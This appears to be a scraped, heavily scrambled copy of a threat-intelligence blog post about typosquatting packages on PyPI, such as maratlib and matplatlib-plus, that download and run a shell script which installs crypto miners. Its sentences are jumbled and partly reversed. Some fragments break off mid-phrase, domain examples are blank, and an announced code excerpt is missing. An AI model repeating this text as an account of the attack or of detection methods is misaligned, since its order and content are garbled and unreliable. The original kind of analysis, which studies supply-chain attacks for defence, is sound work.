- #Typo squatting software
- #Typo squatting code
- #Typo squatting download
matplatlib-plus – a slight variation on the above For example, in a previous attack, a malicious npm package provided colorful logging features for the console, along with a hidden credential stealer.
#Typo squatting code
Some of the previous supply chain attacks were much more subtle and introduced a “trojan library” – meaning a library that was actually of some use, but had a small piece of hidden malware code inside it. Since this is the entire Python payload, it is elementary to detect using automated methods since a “download and execute” command (especially while using the shell via subprocess) is highly malicious. (Excerpt from maratlib package, version 0.6)
.jpg "typo squatting")
In the case of this attack, the Python payload was extremely short and simple – The Python payload – Naïve Typosquatting vs. In this case, the typosquatting attack was performed on PyPI, while ensnaring any developer that misspelled the “matplotlib” package name when using pip install.
#Typo squatting software
The practice applies to many different resources, such as web pages, software package names, and even executable names. This can then further be used for Phishing and code injection attacks. For example – buying the domain name “” (instead of the legitimate “”) hoping that users will occasionally make typing errors and reach the illegitimate domain. Typosquatting is the practice of obtaining (or “squatting”) a popular name with a slight typographical error. The funds are transferred into several mining pools, including: The payload shell script downloads and executes a 3rd party crypto miner, either T-Rex for mining Ethereum or ubqminer / PhoenixMiner for mining Ubiq.
#Typo squatting download
The malicious packages download and execute a payload shell script. Some of the above packages were just proxy packages, which included an actual malicious package as part of their dependencies. learninglib, mllearnlib – Typosquatting packages alluding to learnlib and mllearn. Maratlib, maratlib1, mplatlib, matplatlib-plus – Typosquatting packages alluding to the popular matplotlib or mplotlab. The attacker published six malicious packages into PyPI –. The typosquatting attack flow of the malicious published packages can be summarized in the following way: Present actionable solutions that developers may use to detect and prevent such attacks on their machines. Analyze a newer variant of one of the attacking packages. Present an easy way to deobfuscate the attacker’s packages. Discuss additional methods for automatically detecting these malicious packages which may indicate a possible supply chain attack. In this blog post, we present our own additional research done on top of a novel detection by Sonatype, where a few PyPI packages were detected as malicious packages, packing a crypto-miner payload that mines Ethereum or Ubiq for the attacker. The implications can be severe: in many cases, it can mean a complete takeover of the developed program or device by an attacker.Īttackers attempt to generate this scenario in several ways, among them trying to introduce malicious or vulnerable code into open-source projects and using Typosquatting – adding malicious code into software repositories such as PyPI and npm under names which could be included in a project by mistake (such as misspelled names of legitimate software packages). The complexity of the modern software development process and its reliance on large community-maintained codebases introduces a risk for developers to inadvertently include malicious code into the project. Itay Vaknin, Threat Intelligence Researcher.
0 kommentar(er)
